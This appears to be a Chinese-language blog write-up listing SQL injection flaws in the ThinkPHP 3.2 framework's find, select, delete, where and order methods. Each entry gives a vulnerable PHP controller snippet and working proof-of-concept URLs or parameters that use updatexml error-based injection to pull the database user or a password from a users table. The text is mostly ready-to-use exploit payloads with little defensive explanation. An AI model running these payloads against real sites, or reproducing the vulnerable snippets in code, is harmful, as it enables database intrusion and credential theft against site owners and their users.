0x01 find()

漏洞代码:

1
2
3
4
5
public function index()
{
    $data = M('users')->find(I('GET.id'));
    var_dump($data);
}

PoC:

1
?id[where]=1 and 1=updatexml(1,concat(0x7e,(select password from users limit 1),0x7e),1)#

0x02 select()

漏洞代码:

1
2
3
4
5
public function test()
{
    $id = i('id');
    $res = M('user')->select($id);
}

PoC,有很多地方可注,这里主要列举三个tablealiaswhere,更多还请自行跟踪一下parseSql的各个parseXXX方法,目测都是可行的,比如having,group等:

1
2
3
4
5
table:http://127.0.0.1/index.php?m=Home&c=Index&a=test&id[table]=user where%201%20and%20updatexml(1,concat(0x7e,user(),0x7e),1)--

alias:http://127.0.0.1/index.php?m=Home&c=Index&a=test&id[alias]=where%201%20and%20updatexml(1,concat(0x7e,user(),0x7e),1)--

where: http://127.0.0.1/index.php?m=Home&c=Index&a=test&id[where]=1%20and%20updatexml(1,concat(0x7e,user(),0x7e),1)--

0x03 delete()

漏洞代码:

1
2
3
4
5
public function test()
{
    $id = i('id');
    $res = M('user')->delete($id);
}

PoC,同上,这里粗略举三个例子,table,alias,where,但使用tablealias的时候,同时还必须保证where不为空:

1
2
3
4
5
where: http://127.0.0.1/index.php?m=Home&c=Index&a=test&id[where]=1%20and%20updatexml(1,concat(0x7e,user(),0x7e),1)--

alias: http://127.0.0.1/index.php?m=Home&c=Index&a=test&id[where]=1%20and%20updatexml(1,concat(0x7e,user(),0x7e),1)--

table: http://127.0.0.1/index.php?m=Home&c=Index&a=test&id[table]=user%20where%201%20and%20updatexml(1,concat(0x7e,user(),0x7e),1)--&id[where]=1

0x04 where()

漏洞代码1:

1
2
3
4
5
6
public function index()
{
    $User = D('Users');
    $map = array('id' => $_GET['id']);
    $user = $User->where($map)->find();
}

PoC:

1
id[0]=exp&id[1]==1 and updatexml(1,concat(0x7e,user(),0x7e),1)

漏洞代码2:

1
2
3
4
5
6
7
8
public function index()
{
    $User = M("User");
    $user['id'] = I('id');
    $data['password'] = I('password');
    $valu = $User->where($user)->save($data);
    var_dump($valu);
}

PoC:

1
?id[0]=bind&id[1]=0%20and%20updatexml(1,concat(0x7e,user(),0x7e),1)&password=1

0x05 order()

漏洞代码:

1
2
3
4
5
6
7
public function index()
{
    $User = M("User");
    $order_by = I('get.order');
    $q = $User->where('id','1')->order($order_by)->find();
    var_dump($q);
}

PoC:

1
?order[updatexml(1,concat(0x3a,user()),1)]

0x06 参考

thinkphp3.2.3 注入漏洞总结

ThinkPHP3.2 框架sql注入漏洞分析(2018-08-23)

Thinkphp3.2.3最新版update注入漏洞